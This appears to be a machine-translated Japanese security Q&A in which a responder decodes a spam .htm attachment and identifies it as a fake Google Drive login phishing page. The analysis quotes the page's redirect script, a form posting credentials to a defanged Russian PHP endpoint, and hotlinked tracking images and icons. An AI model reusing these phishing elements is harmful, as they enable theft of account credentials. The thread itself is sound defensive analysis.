htmファイルが添付されたスパムメールを受け取った場合、スクリプトは有害ですか?
今日私はhtm添付ファイル付きのメールを受け取りました、mthには以下のコードが含まれています:
<html>
<head>
<script>
var url = ""
window.location.href= url;
</script>
</head>
</html>
Url変数には247251文字という非常に大きな値が割り当てられています。URLの長さを長くするために、これらは文字化けしているように感じます。
他人にセキュリティ上の脅威をさらさないようにするためだけに、意図的にURLのコンテンツを記述していません。 これは私が言及しているゴミのペーストビンです 。
これを任意のWebブラウザーで開くと、どのような害がありますか?
それはなんですか?
私はあなたの「ゴミ」を解読しました。これはbase64エンコーディングであり、大きすぎてここに配置できません。これがデコードされた結果です: http://Pastebin.com/NBV4iY2s
これは、Googleドライブのログインページの添付ファイルのようです。実際、すべては、いくつかの項目を除いて、Googleドライブから削除されます。
これはフィッシングの試みです
行番号2642からわかるように、実際にはロシアのWebサーバーにデータを送信しようとしています。
<form action="hxxp://www.gladiolusfashion.ru/js/fancybox/country.php" id="signup" method="post" name="signup">
基本的には、単にGoogleアカウントの詳細を盗もうとしているだけです。これはありふれたフィッシングの試みです。
ただし、別の潜在的な問題があります:英国からホットリンクされた画像:
Confirm your identity.<img align="right" border="0" height="33" src="hxxp://www.bountifulbreast.co.uk/images/100Secure.jpg" width="83"></h1>
その可能性が高いのは、その特定の画像へのアクセスが試みられたことをWebサイトの所有者に警告することです。それらのWebサイトの所有者が同じである場合、IPアドレスとアクセス試行が記録される可能性があります。これは、フィッシング攻撃の効果を判断するのに役立ちます。 「何人の人がこれを見るか、どれだけの人がこれに陥るか?」
画像のWebサーバーも侵害された可能性があります。危険にさらされているか、ホットリンクされている可能性があります。言うのは難しいです。
上部では、Googleのホットリンクフィッシング検出の警告を回避するために、フィッシャーは無料のアイコンウェブサイトにホットリンクして正当性のように見せざるを得ませんでした。これは2585と2586の行で確認できます。
<link rel="shortcut icon" href="hxxp://icons.iconarchive.com/icons/marcus-roberto/google-play/512/Google-Drive-icon.png">
<link rel="Apple-touch-icon" href="hxxp://icons.iconarchive.com/icons/marcus-roberto/google-play/512/Google-Drive-icon.png">
最後に、データを送信すると リクエストされたファイルが存在しないことを伝える偽のページに送信されます。(Pastebin)
TL; DR内訳
このフィッシング攻撃は、いくつかのことを試みています。
- 添付ファイルを開くと、偽のGoogleドライブログインがあるページにリダイレクトされ、認証情報を入力するように仕向けます。
- 資格情報を入力するのに十分な馬鹿げている場合、それらはロシアのサーバーにあるphpスクリプトに送信されます。
- 送信されると、 あなたは偽のログインページ(これのペーストビン)を受け取ります) ファイルが存在しないことを伝えます。
結論
開けないでください。それはあなたにあなたの資格情報を入力させることを試みています。